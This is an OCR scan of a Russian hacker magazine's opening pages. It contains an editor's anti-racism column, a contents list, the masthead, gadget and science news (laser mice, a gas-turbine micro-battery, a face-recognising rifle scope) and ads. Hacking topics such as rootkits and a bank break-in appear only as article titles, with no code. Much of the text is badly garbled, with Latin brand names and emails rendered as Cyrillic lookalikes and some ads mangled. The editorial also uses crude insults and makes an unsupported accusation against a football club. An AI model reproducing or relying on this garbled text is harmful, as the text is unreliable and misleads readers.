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и по телефону: (495) 727-0231 
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Обозначения Сеіегоп, Сеіегоп Іпзісіе, Сепігіпо, Сепігіпо Іодо, ІпіеІ, ІпіеІ Соге, ІпіеІ Іодо, ІпіеІ Іпзісіе, Іпіеі Іпзісіе Іодо, ІпіеІ ЗреесІЗіер, ІпѣеІ Ѵііѵ, ІпіеІ Хеоп, Ііапіит, Ііапіит Іпзісіе, Соге Іпзісіе, 
Репйит и Репііит Іпзісіе являются товарными знаками, либо зарегистрированными товарными знаками, права на которые принадлежат корпорации Іпіеі или ее подразделениям на 
территории США и других стран. 







ненавижу фашистов. Меня бесят наци- 
оналисты. Терпеть не могу расистов. 

Я раздражаюсь, когда слышу рассуж- 
дения тупых, закомплексованных и 
озлобленных непонятно на что чмошников о том, 
что какой-то человек хуже или лучше другого из-за 
своей национальности, расы или места рождения. 

Я рад, что из наших паспортов убрали по сути своей 
фашистскую графу «национальность». Я рад, что, 
еще когда мне было 6 лет, развалилась фашистская 
страна СССР, которая, как тебе говорят, этот самый 
фашизм победила. Чушь собачья. 

Скажи, откуда вообще берутся размышления о том, 
что кто-то хуже только из-за цвета кожи или формы 
носа, что кто-то «обезьяна», кто-то обязательно 
плохой человек и что «евреи продали Россию»? Я 
тебе скажу, откуда. Из людской тупости и импотен- 
ции. Импотенции как невозможности реализовать 
себя в этой жизни. Импотенции как невозможности 
понять, чего хочется от этой жизни. Импотенции как 
невозможности думать. 

Нужно признать: в России большинство людей 
импотенты и не способны к собственному развитию и 
собственному мышлению. Им проще бухать жидкость 
для размораживания «Монолит», ничего не делать и 
винить в своем лузерстве людей, которые не такие. 
Тем более, если они евреи, родились на Кавказе или 
приехали из Африки играть в российской футболь- 
ной команде. 

Кстати, о футболе. В этом виде спорта, как ни 
странно, фашизм развит потрясающе сильно. Чего 
только стоит один факт. Посмотри на команду «Зе- 
нит» из славного городка Санкт-Петербурга. Уди- 
вительно: в ней нет ни одного темнокожего игрока. 
Думаешь, случайность? Нет, это известный факт: 
цвет кожи — определяющий фактор селекционерс- 
кой работы клуба. На уровне Президента клуба есть 
установка: « В нащих цветах нет черного» . Баннер 
с этим лозунгом местные гопники растягивали на 
трибунах. Это действительно так. Президент клуба 
боится импотентов и сам становится им. 

По сути, это самый жестокий комплекс - сваливать 
собственную чмошность и собственное ничтожес- 
тво на других людей, которые по-другому выглядят. 
Это абсолютно животный, первобытный инстинкт 
— правильно и красиво то, чего вокруг больше. А 
если я — чмо, то виновам в этом тот, кто по-другому 
выглядит. 

Я не выходец с Кавказа, у меня не еврейские корни и 
я не из Африки. Но мне очень противно, когда тупой 
баран «Саша» с, как он думает, славянской вне- 
шностью пытается до#баться в метро до спокойно 
едущего парня с армянским носом. Мне дико, когда 
я читаю новости о зверских убийствах приезжих сту- 
дентов и детей в Воронеже и Питере. Мне СТЫДНО, 
что у меня одно гражданство с этими ублюдками. 





Я очень хочу, чтобы ты понял: у всего есть обратная 
сторона, нельзя верить и вестись, как последний лох, 
на все установки, которые тебя навязывают снаружи, 
Нужно иметь собственное мнение, а не ложиться 
под мнение тупого большинства, учителей, родите- 
лей или Президента страны. Нельзя принимать как 
аксиому то, что тебе говорят все. ВСЕ — они обычно 
ошибаются. 

Ты не должен быть импотентом. Ты много можешь 
сделать, многого добиться. Я в тебя верю. Но ты 
должен сам думать и понимать, что и для чего 
ты делаешь и зачем ты живешь. 

Приятного чтения! 
пікііогг, гл. ред. Хакера 








СОІМТЕМТ • 1 1 (95) 



МЕОАЫЕѴѴЗ 

004 МЕОАЫЕѴѴ5 

Все новое за этот месяц 



ГЕКК1Ш 

01 6 МИНИКОМПЬЮТЕРЫ В ДОРОГУ 

Тестирование ноутбуков малого размера 

022 НОВИНКИ 

Обзоры и тесты самых свежих девайсов 

024 ѴРІМ-РОУТЕР ШКЗѴЗ ВѴ042 

Мне двойной ѴѴАКІ, пожалуйста! 

028 НЕ РАЗ ПЛЮНУТЬ 

О том, почему вредно заправлять картриджи Ерзоп 

ШЗЮЕ 

030 КИШКИ ТАКСОФОНА 

Разбираемся в устройстве таксофона 

СЕРВЕРНАЯ 

034 НА ЧЕМ КУЮТ «ХАКЕР» 

Цифры и факты о нашей компьютерной системе 

РС 20ЫЕ 

038 ПРОЩАЙ, ТОРМОЗА! 

Как запустить виртуальную машину без тормозов! 

044 СЕРВЕР В КАРМАНЕ 

Необычное использование карманного компьютера: 
делаем из него сервер! 

048 ВАС ВНИМАТЕЛЬНО СЛУШАЮТ 

Скрытые аспекты безопасности в СЗМ-сетях 

1МРІ.АМТ 

054 МЕДИЦИНА АТАКУЕТ! 

Все о наномедицине XXI века 



ІЛіІХОЮ 

110 

114 



118 



123 



ЧЕРЕЗ РЕВОЛЮЦИЮ К ЭВОЛЮЦИИ 

Обзор ключевых технологий *піх 

ЛИЧНАЯ НЕПРИКОСНОВЕННОСТЬ ДЛЯ ТУКСА 

І_ЮЗ: система обнаружения и защиты от вторжения 

ПОКОРЕНИЕ ВЕРШИН ОТЛАДКИ 

Трассировка во тьме с завязанными глазами 

ТІРЗ'ІМ'ТВІСКЗ 

Советы и трюки для юниксойдов 



кодинг 

124 ЕУЕ ОР ТНЕ ХАКЕР 

Программируем самоходную веб-камеру под линукс 

1 30 ЖАЖДА СКОРОСТИ 

Экстремальный разгон процессора 

136 ТРЮКИ ОТ КРЫСА 

Программерские приемы Криса Касперски 

138 ТРОЯН С СИНИМ ЗУБОМ 

Как хакеры впаривают злые программы по Ыиеіооііі 

ЫГЕ8ТѴІ.Е 

141 РАІІЧТВАШ ОЕАТНМАТСН 

Как читатели надрали нас в пейнтбол 

КРЕАТИРР 

144 ОСТРОВ 

Традиционный жреатифф Майндворка 



ІШІТ5 

150 

152 

158 



РАО 



консультация Зіер’а 



ВЗЛОМ 

060 

066 

068 

074 

078 

082 

086 

090 

094 

096 

СЦЕНА 

098 

104 

108 



ОБЗОР ЭКСПЛОИТОВ 

И переполнение буферов в суровых условиях висты 

НАСК-РАО 

Вопросы и ответы о взломе 

ЗВЕРСКИЙ ВЗЛОМ ѴѴІІ\ЮОѴѴ5 ѴІЗТА 

Совершенные руткиты готовы атаковать новую винду 

ТЕРМИНАЛЬНАЯ ЭПОПЕЯ 

Как ломают терминальные серверы 

ТРЕНИРУЕМСЯ НА КОШКАХ 

Тренировка во взломе шароварных программ 

ДЕЛАЕМ ДЕНЬГИ 

ИІдустрия спама 

БЕРЕМ СБЕРБАНК 

Взлом Сберегательного банка Украины 

НА ПИКЕ СЛАВЫ 

Продвижение своего сайта на верхушку поисковика 

Х-КОНКУРС 

Итоги традиционного конкурса взлома 

Х-ТООЬЗ 

Программы для взлома 



ОБЫКНОВЕННЫЕ ЧУДЕСА НІ-ТЕСН 

Обзор компьютеров, которых ты еще не видел 

БОЙЦЫ НЕВИДИМОГО ФРОНТА 

Хак-группы, работающие в тени 

Х-РВОРІЬЕ 

Профайл хакера Міхіег'а 





/Редакция 

>Главный редактор 

Никита «пікіІ 022 » Кислицин 
(пікіі 02 @геаІ. хакер, ги) 
>Выпускающий редактор 
Николай«догІ»Андреев 
(догІит@геаІ. хакер, ги) 

>Редакторы рубрик 
ВЗЛОМ 

Дмитрий «РогЬ» Докучаев 
(ЬгЬ@геаІ. хакер. ги) 
РС_20МЕиІІМТ5 
Степан «зіер» Ильин 
(зІер@геаІ. хакер. ги) 

СЦЕНА 

Олег «тіпсІѵѵОгк» Чебенеев 
(тіпсІѵѵОгк@геаІ. хакер, ги) 

ІІМХОЮ 

Андрей «Апбгизбоск» Матвеев 
(апбгизИоск@геаІ. хакер. ги) 
КОДИНГ 

Александр «Ог. КІоипіг» Лозовский 

(аІехапбег@геаІ. хакер. ги) 

ИМПЛАНТ 

Юрий Свидиненко 

(папоіпіо@таіІ.ги) 

>Литературный редактор 
и корректор 
Варвара Андреева 
(апб гееѵа@датеІапсІ . ш) 

/РѴй 

>Выпускающий редактор 

Степан «Зіер» Ильин 
(зІер@геаІ. хакер, ги) 
>ѴѴіпсІоѵѵ5-раздел 
Андрей «Зкѵогпоу» Комаров 
(зкѵо 2 поу@геаІ. хакер. ги) 
>Цпіх-раздел 

Андрей «Апбгизііоск» Матвеев 
(апбгизІіоск@геаІ. хакер. ги) 



/АП 

>Арт-директор 

Евгений Новико^Н 
(поѵікоѵ.е@датеІапб.ги) 

>Дизайнер 

Анна Старостина 

(зІагозІіпа@датеІапб.ги) 

>Верстальщик 

Вера Светлых 

(зѵеіІуб@датеІапб.ги) 

>Цветокорректор 

Александр Киселев 

(кізеІеѵ@датеІапб.ги) 

>Иллюстрации 

Соня Хаустова 

(ИеІІотупатеізсогпеІіиз@дтаіІ.сот) 
Александр «аздіШ» Гладких 
(аздие!@дтаіІ.сот) 

Стас «СЫН» Башкатов 
(сбіІІ.дип@дтаіІ.сот) 



/іЫеі 

>\А/еЬВозз 

Алена Скворцова 
(аІуопа@геаІ. хакер. ги) 

>Редактор сайта 
Леонид Боголюбов 
(ха@геаІ. хакер. ги) 

/Реклама 

>Директор по рекламе 

Игорь Пискунов (ідог@датеІапб.ги) 

> Руководитель отдела рекламы 

цифровой группы 

Ольга Басова (оІда@датеІап<±ги) 

>Менеджеры отдела 

Ольга Емельянцева 

(оІдаептІ@даптеІапсІ.ги) 

Оксана Алехина 
(аІекбіпа@датеІапб.ги) 

Александр Белов (ЬеІоѵ@датеІап<±ги) 



Евгения Горячева 
(догуасИеѵа@датеІапб.ги) 

> Т рафик менеджер 
Марья Алексеева 
(аІекзееѵа@датеІапб.ги) 

/РиЫізИіпд 

> Издатель 

Борис Сквормов 
(Ьогіз@дате апб.ги) 
>Редакционный директор 
Александр С ідоровский 
(зібогоѵзку@датеІапб.ги) 
>Учредитель 
ООО «Гейм Лэнд» 
>Директор 
Дмитрий Агапунов 
(бтіІгі@дате апб.ги) 
>Управляю 
Давид Шостак 
(зІтозІак@датеІапб.ги) 
>Директор по развитию 
Паша Романовский 
(готапоѵзкі@датеІапб.ги) 
>Директор по персоналу 
Михаил Степанов 
(зІерапоѵт@датеІапб.ги) 
>Финансовый директор 
Елена Дианова 
(біапоѵа@датеІапб.ги) 
>РВ-менеджер 
Илья Пожарский 
(ро 2 Ііагзку@датеІапб.ги) 



іи директор 



/Оптовая продажа 

>Директор отдела 
дистрибуции и маркетинга 

Владимир Смирнов 
(ѵІабітіг@датеІапб.ги) 
>Оптовое распространение 
Андрей Степанов 
(апбгеу@дап|еІапб.ги) 



>Связь с регионами 
Татьяна Кошелева 

( козИеІеѵа^датеІанс) . га )■ — 

>Подписка 

Алексей Попов 
(ророѵ@датеІапб.ги) 
тел.: (495)935.70.34 
факс: (495) 780.88.24 

> Горячая линия по подписке 

тел.: 8 (800) 200.3.999 
Бесплатно для звонящих из России 

> Для писем 

101000, Москва, 

Главпочтамт, а/я 652, Хакер 
Зарегистрировано в Министерстве 
Российской Федерации по делам 
печати, телерадиовещанию и 
средс твам массов ых коммуникаций 
ПИ Я 77-1 1802 от14фщаля2002г. 
Отпечатано в типографии 
«ЗсапѴѴеЬ», Финляндия 
Т ираж 1 00 000 экземпляров. 

Цена договорная. 

Мнение редакции не 
обязательно совпадает с 
мнением авторов. Редакция 
уведомляет: все материалы в 
номере предоставляются как 
информация к размышлению. Лица, 
использующие данную информацию 
в противозаконных целях, могут 
быть привлечены к ответственности. 
Редакция в эти^Случаях 
ответственности не нЭЬет. 

Редакция не несет ответственности 
за содержание рекламных 
объявлений в номере. 

За перепечатку наших материалов 





ОЛЕГ ЧЕБЕНЕЕВ 

/ МІЫОѴѴОПК@САМЕІ.АЫО.іиі / 

ЮРИЙ СВИДИНЕНКО 

/ КАММЕКЕК МАХ@ѴАНОО.СОМ / 

СЕРГЕЙ НИКИТИН 

/ ШКІТШІСІ.С. ГШ / 



-> ЛАЗЕРНЫЕ ЗАЩИТНИКИ 

У джѳдаѳв есть лазерные мечи, но тебе нет никакой нужды им 
завидовать. Ведь сегодня компания Эеіепсіег представляет новую 
серию мышек, оснащенныхтехнологией ІЯ-І_азег (инфракрасный 
лазер). Луч в нем управляется с помощьюлинз, за счет чего дости- 
гается большая производительность и точность манипулятора. 
Эти грызуны могут бегать даже по таким поверхностям, как глян- 
цевая фотобумага, прозрачный пластик и т. д., — то есть там, где 
оптические устройства пасовали. Линейка состоит из 7-ми моде- 
лей. Компактная мышь СІіо-тіпі созданаспециально для ноутбука; 
Сбатеііоп переливается несколькими цветами во время работы; 
изящный корпус мыши Ритаудобно лежит в руке; лазерная мышь 
Зпірег — это практичная модель с оптимальным соотношением 
цены и качества; Реііех понравится профессионалам, работа- 
ющим с компьютерной графикой; ОІасІіаіог с жестким дизайном 
и широким эргономичным корпусом не оставит равнодушными 
мужчин; а элегантная Рапіега воплотила в себе красоту и удобс- 
тво. Найти такой девайс можно будет по цене до 15-ти долларов. 





-» НОВЫЕ ПЛЕЕРЫ 
1 /ЕНВАТІМ 



Давно прошли те времена, когда брэнд ѴегЬаііт ассо- 
циировался только с носителями данных — дискетками 
(да, мы еще помним такое слово!) и болванками для оп- 
тических приводов. Сегодня в ассортименте компании 
много совершенно другихустройств. Например, она 
объявила о выходе 3-х новых МРЗ-плееров серии ЗІоге 
‘п’ РІау: ѴМ-205, ѴМ-01 и ѴМ-399. Все они работают 
с форматами МРЗ и ѴѴМА, обеспечивая, по словам про- 
изводителя, 10-15 часов непрерывной работы. Модель 
ѴМ-205 имеет стильный дизайн, маленькие размеры 
и вес менее 40г. Встроенная память в плеере — 256 Мб. 
Но, если этого не хватает, можно использовать карту 
памятиЗЭс объемомдо4 Гб. Цена — менее 40-каевро. 
Устройство ѴМ-01 имеетширокий экран и 1 Гбпамяти. 
Заряда батареи хватает на 10 часов беспрерывного 
прослушивания. Цена — около 65-ти евро. Модель 
ѴМ-399 — это «флагман» новой линейки, обладающий 
2-мя выходами на наушники и встроенным радио. 
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Позови , когда будет 
мой любимый клип! 



Не волнуйся, я запишу. 
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ГЛАВНОЕ - это ИДЕЯ! 



Тебе нужен цифровой видеомагнитофон, фотоальбом, ОѴО-проигрыватель, 
телик с электронной программой передач, радио, тр-3 и Сй-плеер? 

Кгаіішау Шеа МС на базе процессора Іпіеі® Соге™ 2 Оио легко заменит тебе это. 

И не забудь, что это еще и мощный ИГРОВОЙ КОМПЬЮТЕР! 

КгаЙдау рекомендует лицензионную ОС ѴѴіпсіоѵѵз® ХР Месііа Сепіег ЕсШіоп. 



СПРАШИВАЙТЕ В МАГАЗИНАХ ЭЛЕКТРОНИКИ 

Белый Ветер — ЦИФРОВОЙ М. ВИДЕО 

тел: (495) 730-30-30 тел: 8-800-777-777-5 




фИгаПіАву* 

ТЕХНОЛОГИИ ДЛЯ ЛЮДЕЙ 



ТВ-тюнер и пулы в стандартный комплект поставки не входят. Внешний вид товара может быть изменен без предварительного уведомления. Товар сертифицирован. 

Соге Іпзісіе, Іпіеі, Іпіеі Іодо, ІпТеІ Соге, Іпіеі Іпзісіе, Іпіеі Іпзісіе І_одо являются товарными знаками, либо зарегистрированными товарными знаками, права на которые принадлежат корпорации ІпТеІ или ее подразделениям на территории США и других стран. 




$МЭ N ѴѲЭ ІЛІ *$МЭ N ѴѲЭ ІЛІ *$МЭ N ѴѲ 




■> МАРС АТАКУЕТ 



Кулеры для СРЕІ давно уже перешли из просто охлаждающих уст- 
ройств в фишку для эстетствующих Ні-ТесН-энтузиастов. Сегодня 
это уже монструозные конгломераты дизайнерского искусства 
и научной мысли. Компания Сооіег Мазіег недавно представила 
на российском рынке очередной шедевр — кулер Магз РП-ССХ- 
ѴѴ91І2-ОР. Это устройство обладает оригинальным экстерьером 
и внешне напоминает воздушный шар. Визуальный эффект 
дополняет синяя диодная подсветка. Толстое медное основание 
охладителя соприкасается с процессором, а 3 тепловые трубы 
Гоглера отходят от нее дугой и встречаются уже на «макушке» ус- 
тройства. Холодный воздух засасывается мощным вентилятором 
сверху, а, будучи уже нагретым, выбрасывается около подошвы 
самого кулера. Устройство рассчитано на использование как на 
процессорах от АМЭ, так и на процессорах от ІпіеІ. 




-> ОПЕРАЦИИ В НЕВЕСОМОСТИ: 
БАЗА ДЛЯ РОБОТОВ-ХИРУРГОВ 



Французские хирурги, пообещавшие первыми прооперировать 
человека в моделируемой невесомости, выполнили задуманное. 
Бригада из 5-ти врачей, пролетая над юго-западом Франции 
на специальном м икрогравитационном самолете А300 2его-Ѳ, 
успешноудалилажировую опухоль из предплечья пациента. 
Оперировать пришлось в 32 захода — именно столько понадо- 
билось 22-секундных периодов невесомости. Всего же лайнер 
сделал 45 подъемов по параболе. «... Мы провели простую 
операцию, которая позволила нам поработать в космических 
условиях, — сообщил руководитель группы медиков Доминик 
Мартен, — когда вы будете рассматривать фотографии этой 
операции, вам может показаться, что хирурги работают на земле, 
как обычно, за исключением того, что вы увидите, как некоторые 
вещи плавают в воздухе». 

Целью французских докторов было испытание медицинских 
технологий, которые смогут пригодиться для оказания помощи 
обитателям базы на Луне, астронавтам, летящим к Марсу, и созда- 
телям роботов-хирургов. 



-> ОПРЕДЕЛЯЯ БУДУЩЕЕ 
СМІСРЮ80ЕТ 

Если тебя интересует продукция Місгозоіі и у тебя нет 
более важных планов на 13 — 14 декабря, компания 
приглашаеттебя принять участие в ежегодной конфе- 
ренции «Платформа», которая состоится уже в 8-й раз. 
Программамероприятия очень интересная : выставка 
программных решений от М3 и ее партнеров, техни- 
ческие доклады, возможность общения с экспертами 
компании, круглый стол и надесерт — неофициальная 
вечеринка. Так как халявщиков у нас в стране много, 
а мест на «Платформе» мало — участие платное и 
обойдется тебе в 6000 рублей. Зато МісгозоЙ обещает 
всем посетителям в подарок дистрибутивы ОІІісе 2007 
и ѴѴіпсІоѵѵз Ѵізіа. 

Более подробно узнать о конференции и при желании 
зарегистрироваться можно на официальном сайте 
Иир://тісгозоІТсот/гиз/РІа1Іогт2007 . 




4 БИОМЕТРИЧЕСКИЙ 
БРЕЛОК 

Американцы создали первый в мире биометрический 
брелок. РІизЮ — новая разработка компании Ргіѵагіз. 
Брелок, помимо выполнения функций собственно 
держателя обычных ключей, сам служит ключом для за- 
пуска любого устройства, способного принимать шиф- 
рованные радиосигналы (в брелок встроено несколько 
передатчиков, работающих на разных частотах и по раз- 
ным стандартам — РРЮ, ВІиеіооіб, ІЕЕЕ 802.15.4 и др.). 

В роли приемника могут выступать и дверной замок, 
и привод гаражных ворот, и компьютер с данными, до- 
ступ к которым нужно ограничить, — то есть фактически 
все что угодно. Достаточно приложить к брелоку палец, 
чтобы приборчик, сравнив отпечаток с хранящимся 
в памяти образом, послал в эфир нужный сигнал. 
Электронные дверные замки с датчиком отпечатка 
пальца уже давным-давно не новость, как и аналогичные 
биометрические замки на ноутбуках, сумках и кейсах. 
Однако в новом устройстве реализован иной принцип: 
владелец РІизЮ не только «носит с собой» свой собс- 
твенный отпечаток, который, понятно, всегда при нем, 
но и держит при себе файл с описанием этого отпечатка 
— в недрах устройства. А чтобы отпереть замок, нужен 
не отпечаток, а кодовый сигнал, который невозможно по- 
лучить, не приложив палец владельца к брелоку. Таким 
образом, в замке, куда бы он ни был встроен (в дверь 
квартиры или в РС), этой информации нет, и злоумыш- 
ленники при всем желании не смогут подделать отпеча- 
ток, даже взломав «мозги» электронного замка. 
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♦ ГАЗОТУРБИННАЯ БА ТАРЕЙКА 
РАЗМЕРОМ С МОНЕТУ 



> Установка Мадпеііс заіеііііе ІаипсМ зузіет 




Исследователи из Массачусетского технологического института 
сделали почти невозможное — они сконструировали миниатюр- 
ную батарейку наоснове... газовой турбины! Микроскопическую 
турбину поместили в кремниевый чип размерами чуть больше 
25-центовой монеты. При этом, как показали тесты, газовая бата- 
рейка может работать в 10 раз дольше электрического аналога. 
Ученые из МТИ использовали самые последние достижения 
в области МЭМС-систем. Лопасти у турбины изготовлены из спе- 
циального сверхтвердого материала, который позволяеттурбине 
работать на большой скорости — 20000 оборотов в секунду. 
Саматурбина — довольно сложная микросистема. Онасостоит 
из 6-ти соединенных между собой кремниевых пластин. Каждая 
пластинатурбины представляет собой цельный кристалл 
с «выстроенными по линейке» атомами и поэтому отличается 
высокой прочностью. Для изготовления компонентов мотора 
каждую пластину индивидуально обрабатывали гравировкой, 
удаляя лишний материал. Между пластинами располагается 
механизм турбины. Первоначально изготавливается кремние- 
вая вафля, на которой вырезано 80-100 деталей. Затем вафлю 
раскалывают и из кремниевых узлов собирают газовую турбину 
номинальной мощностью 10 Ватт. В крошечной камере сгорания 
топливо и воздух смешиваются и горят при температуре плавле- 
ния стали. Небольшой компрессор нагнетает воздух и обеспе- 
чивает охлаждение: часть воздуха направляется не в камеру 
сгорания, а в полости ее корпуса. Ученые планируют разрабо- 
тать прототип батареи для ноутбука, которая позволит сделать 
портативные компьютеры действительно мобильными. 

-> ОПТИЧЕСКИЙ ПРИЦЕЛ ЗНАЕТ 
ТЕРРОРИСТОВ В ЛИЦО 

Тяжелая работа доблестных американских морпехов, борю- 
щихся с международным терроризмом в горячих точках планеты, 
скоро станет значительно легче. Снайперу нужно будеттолько 
навести винтовку на подозрительного человека, а «умная» элек- 
троника узнаеттеррориста в лицо и даст команду «Огонь!». 
Исполнительный директор компании АСАѲІ, разрабатывающей 
систему, говорит о новом проекте так: «У солдат есть камеры на вин- 
товках или шлемах, но это только половина уравнения. Ведь эта ап- 
паратура ничего не распознает. А наша система, увидев кого-то, кого 
оназнает, говорит об этом, позволяя быстро принимать решения». 

В систему будут загружены предварительно взятые фотографии 
потенциально опасных личностей. Это сделать достаточно прос- 
то, так как главные террористы спецслужбам известны. 

Мозг системы ІАЕС8 (Ітаде АсцшзШоп апсі Ехріоііаііоп Сатега 
Зузіет) представляет собой 900-граммовый компьютер, кре- 
пящийся на поясе. Камера монтируется либо на шлеме, либо 
параллельно с оптическим прицелом. В последнем случае 
можно точно указывать электронике человека, которого нужно 
проверить. Первые образцы карманных приборов ІАЕС8 должны 
быть готовы к концу нынешнего года. Это будет первая в мире 
мобильная и полностью автономная система распознавания лиц 
в реальном времени. 



-» ИЗ ПУШКИ 

НА... ОКОЛОЗЕМНУЮ 

ОРБИТУ 

Одна из задач космических инженеров — разработка 
эффективных и недорогих способов доставки грузов 
на орбиту. Еще в конце позапрошлого века Жюль Верн 
предлагал простой способ космических путешествий: 
стрелять космическими аппаратами из пушки. 

Конечно, это схема не для космотуризма, но для 
доставки легких спутников — самое то. Разработкой 
электронной пушки-ускорителя занялись американ- 
ские ВВС, которые финансируют проект системы за- 
пуска сверхлегких спутников. Однако Мадпеііс заіеііііе 
ІаипсИ зузіет — вовсе не пушка, а огромное кольцо, 
схожее по устройству с ускорителями частиц, которые 
помогают физикам раскрывать тайны природы. Только 
вместо частиц это кольцо будет разгонять небольшой 
контейнер со снарядом, внутри которого будет нахо- 
диться десятикилограммовый спутник. 

Вначале инженеры построят масштабный прототип сис- 
темы с кольцом диаметром около 50 метров. А в окон- 
чательном виде система должна представлять собой 
кольцо диаметром 2 километра с комплексом сверх- 
проводящих электромагнитов для удержания и разгона 
контейнера со спутником. 

Спутник предполагается заключить внутрь конусного 
снаряда, состоящего из очень массивного вольфрамо- 
вого наконечника отсека для полезной нагрузки, сопла 
ракетного двигателя, баков для горючего и окислителя. 

В конце разгона по кругу на спутник будет действовать 
центростремительное ускорение в 1 0 тысяч д. Однако 
электроника в управляемых гаубичных снарядах выдер- 
живает выстрелы в 20 тысяч д. Так что вполне можно 
создать крошечные спутники, способные перенести 
такую перегрузку. 



> В прицеле — террорист! 
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новый тариф 



Ты много общаешься с друзьями, живешь 25 часов в сутки, 
используешь мобильный на полную? 

Привык разговаривать 5М5ками и обмениваться ММБками? 
Есть с кем болтать всю ночь? Тогда КЕР- тариф для тебя! 

• Дешевые $М5 и ММ5 внутри сети МТС 

• Исходящие по очень низкой цене внутри тарифа КЕР 

• Скидка на "ночные разговоры" 

Подробнее о тарифе на ѵѵѵѵѵѵ.тіз.ги 

О ком ты думаешь сейчас? 



МТС 



Тариф действует с 5 сентября 2006 г. Подробная информация по номеру 05907, 
а также на сайте и в салонах-магазинах МТС Вашего региона^ На правах реклаіѵ 
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+ В КОСМОС ЗА $200 000 



Сегодня, для того чтобы полететь в космос, нужно от- 
валить от одного до нескольких миллионов долларов, 
а скоро, чтобы стать космотуристом, можно будет 
купить билет всего за... $200 тысяч. Такой обвал 
цен возникнетв связи с проектированием частного 
космолета ЗрасеЗМрТѵѵо (332). 

Глава империи Ѵігдіп Ричард Брэнсон устроил пре- 
зентацию на фестивале ЫехіРезІ и традиционном 
чудо-форуме американского журнала ѴѴігесІ. 
Зрителям были явлены парящий над сценой кос- 
моплан ЗрасеЗМрОпе и примостившийся под 
ним макет преемника в натуральную величину 
с «распахнутым» правым бортом. 

Новый 332, также известный под названием ѴЗЗ 



Епіегргізе, в отличие от 331 , спроектирован исключительно для 
космического туризма. Поэтому корабль примерно в 3 раза 
крупнее предшественника и вмещает 8 человек: 6 пассажиров 
(в салоне с 2-мя рядами по 3 кресла в каждом) и 2-х пилотов (в от- 
деленной от салона кабине). 

ЗрасеЗбірТѵѵо, как и второе поколение самолета-разгонщика — 
ѴѴЫІеКпідНПѵѵо, который поднимет332 на высоту 18,2 тысячи метров, 
строит компания Берта Рутана ЗсаІесІ Сотрозііез, точнее, ее «дочка» 
— ЗрасезНір Сотрапу. 

Суборбитальные полеты туристов на высоту 110 — 140 километ- 
ров, длящиеся 2,5 часа, намечены на начало 2009-го, а запуски 
будут происходить с нового космодрома в Нью-Мексико. 

Через 12 месяцев космолет будет проходить испытательные 
полеты, тогда и решится судьба будущих космотуристов. 



-► І\ІЕ8: САВВОЙ -> ПОЛНАЯ /VI /ЮІА 

УЖЕ В ПРОДАЖЕ! ОТ Е0ХС0Ш 

3 ноября компания-разработчик ЕІесігопіс Агіз несказанно обрадовала 
фанатов гоночной серии ЫеесІ Тог Зрееб, выпустив новую часть 
ЫРЗ — СагЬоп. Помимо того, что игроки могут погонять по улицам мега- 
полиса и выжженным каньонам, им предстоит впервые оценить новый 
командный режим игры. 

Выиграть самому теперь мало — нужно заботиться о команде, апгрей- 
дить тачки своих ребят и следить за их успехами. Только от тебя зависит, 
будеттвоя команда одним слаженным механизмом, или кучкой метал- 
лолома, мешающего друг другу. 

Разработчики расширили возможности тюнинга машин, и теперь 
можно изменять вообще все, от формы дисков в колесах до цвета 
выхлопной трубы. Также нам обещают более 50-ти видов авто, имеющих 
реальные аналоги, и невиданную в предыдущих сериях ЫРЗ физичес- 
кую модель управления. 

Изменилась и главная цель игры. Если раньше тебя привлекали деньги 
и слава, то теперь приготовься побороться за то, что на самом деле 
имеет смысл — власть! Не жди, что город сразу же признает в тебе 
авторитета, тебе еще предстоит показать, на что ты способен. И тут 
уж все зависит от твоего мастерства и умения управляться с рулем. 





Компания РОХООМЫ представила полную линейку ви- 
деоплат наоснове чипов ІЧѴЮІА. Онавключаетв себя 
самые разные устройства, начиная от недорогих плат 
начального уровня и заканчивая мощнейшими девай- 
сами, рассчитанными на пробитых игровых маньяков. 
Таким является видеоадаптер РѴ-Ы795М402-СЮ, име- 
ющий наборту2 ГП ЫѴЮІАОеРогсе 7950 0X2 и 1 Гб 
памяти ОООРЗ. По мнению создателей, могут найтись 
люди, которых не устроит базовая производитель- 
ность платы. Они могут «немного» потратиться и реа- 
лизовать на своем ПК режим ОиасІ ЗІ_І. Ниже в табеле 
о рангах стоит графическая плата РѴ-М790М302-НР 
набазе процессораОеРогсе 7950 ОТ с 512 Мб памяти. 
Ну а для тех, кто по каким-то причинам решил на видю- 
ху не разоряться, имеются модели РѴ-Ы73ЕМ20Т/1 ОТ 
начипе ОеРогсе 7300БЕ и РѴ-М713М20Т/ЮТ набазе 
710003. 
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А05І_-модемы 2уХЕ1. 

С другими люди не связываются 



Для подключения к; Интернету через 
АОвІ. выбирайте специально 
адаптированные для российских 
условий модемы или интернет- центры 
компании 2уХЕи рекомендованные к 
применению ведущими провайдерами. 
Благодаря фирменному механизму 
защиты от помех вы получите 
максимальную скорость Интернета, то 
есть не будете платитъ за сбои и потери 
в телефонной линии. 



При настрой обычного А 081- модом а 
н^кно проделать дюжину операций или 
вызывать на дсзм технического 
специалиста. Но ото ужев прошлсзм. 

С новой интеллектуальной технологией 
2уХЕІ_ ЫеіРгіепй достаточно выГцзатгь 
вашего провайдера и тариф из списка 
и весь процесс настройки Интернета 
и интерактивного телевидения займет 
не более пяти минут! Технология АС)5!_ в 
интернет- центрах 2уХЕІ_ позволяет с расу 



на нескольких домашних компьютерах 
загружать веб-страницьі, музыку, 
работать с олектіюннйй почтой. Смотреть 
цифровгда телеві^дений черва приставку 
и в то же время беспрепятственно 
разговаривать по телефону Все модемы 
2уХЕІ_ поддерживают новейший стандарт 
А 0312+, то есть вы сможете получать 
через Обычную телефонную розетку доже 
телепрограммы в ьюокой четкости. 







ц Ф ♦ 



Р-6305 

Компотный мадам 
Л05І_дтгч кс+м (ыотера 
гіЛИнОѴТбуиД 
с юртом 135 В 



Р-660 РПГ 

Модем ЛОВ І_2 ■ длй 
компьютера о поріом 
ЁНнгпѳІ 



Р-66ОЯ0 

УтаероадьнжЪ модам 
А05С2і о портами ива 
и ЕІЛеягеІ дли любого 
кслмшвтера 



р-ебонт 

Шмішнии і™ горча І-ианРр 
о модемом Л05І.2 ’ для грек 
компьютарся и ТВ-при&таям 



Р свои™ 

Домашний ™*гар»еі -цантро модемом 
А05С2 * »*ѴЛ-Рі для трех юмлыоаеров. 
ТЗ-щютянн и беспроводна 
юѵіО^аа 



ГГІ Быстрая 

настройка 
шШ МеіРйепб 



Бесплатная горячая линия 2уХЕ1; 
(495) 542-8929. 8 (800) 200 8929 

ошпкг:уиЕІліі 



2уХЕк I 
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+ІСАШ— ТРЕТЬЯ ЛИШНЯЯ? 



